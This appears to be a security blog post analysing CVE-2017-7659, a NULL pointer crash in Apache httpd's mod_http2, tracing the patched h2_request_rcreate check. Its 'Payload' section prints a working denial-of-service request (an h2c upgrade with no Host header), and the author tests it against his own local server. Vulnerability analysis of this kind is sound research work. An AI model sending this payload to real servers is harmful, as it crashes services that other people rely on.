Apache CVE-2017-7659 Issue Analyse

SpZ included in categories Penetration Security

13-07-2017 13-07-2017 408 words 2 minutes

/apache-cve-2017-7659-payload/featured-image.webp

Contents

This article shows the detail of CVE-2017-7659 vulnerability, and also shows how to develop a CVE-2017-7659 payload.

Introduction

Recently, Apache released Apache httpd 2.4.26. And 2.4.26 fix several issues. You can find the detail of the patch from this link. CVE-2017-7659 is one of the issues.

This article shows the detail of CVE-2017-7659 vulnerability, and also shows how to develop a CVE-2017-7659 payload.

Summary of the Issue

For the CVE-2017-7659, Apache provides the following description:

A maliciously constructed HTTP/2 request could cause mod_http2 to dereference a NULL pointer and crash the server process.

From the GitHub change log, we can find that only one line changed, which is that the application checks the h2_request_rcreate function return value.

Analyse

The CVE-2017-7659 issue is related h2_request_rcreate function. So, let’s check this function.

If we read the issue code, we can find that Apache HTTP uses h2_request_rcreate function to create HTTP 2.0 data structure req. If h2_request_rcreat is failed, req will become to NULL. When ap_log_rerror uses it, it will lead the HTTP process break down.

ap_log_rerror source code — ap_log_rerror code

Then, we go to h2_request_rcreate function. We can find that in the begin, this function setup req to 0, then check 4 variables: r->method, scheme, r->hostname and path. If any of these variables is NULL, it will return failed. And if it returns failed, the req still is 0, and the HTTP process will be broken down.

In these above variables, only hostname can be controlled, and it can be NULL. Therefore, if we create an HTTP request without hostname, it will break down the Apache HTTP process.

Payload

Now, let’s create CVE-2017-7659 payload. To trigger this issue, its musts meet the following requirements:

The target website supports HTTP 2.0
We are able to submit HTTP 1.0 request without Hostname parameter.

The following HTTP request is the payload:

1
2
3
4
5
6
7


GET / HTTP/1.0
User-Agent: curl/7.50.1
Accept: */*
Connection: Upgrade, HTTP2-Settings
Upgrade: h2c
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 2

Testing

First, I implement an Apache HTTP server on my Kali Linux. The version is 2.4.25.

Then, I start Apache, the website and server is working very well.

Then, using burp to submit the above payload to Apache HTTP Server.

After submit the payload, the website does not give any response. If you check the Apache Log, you will find some segment fault errors and the HTTPD process is dead.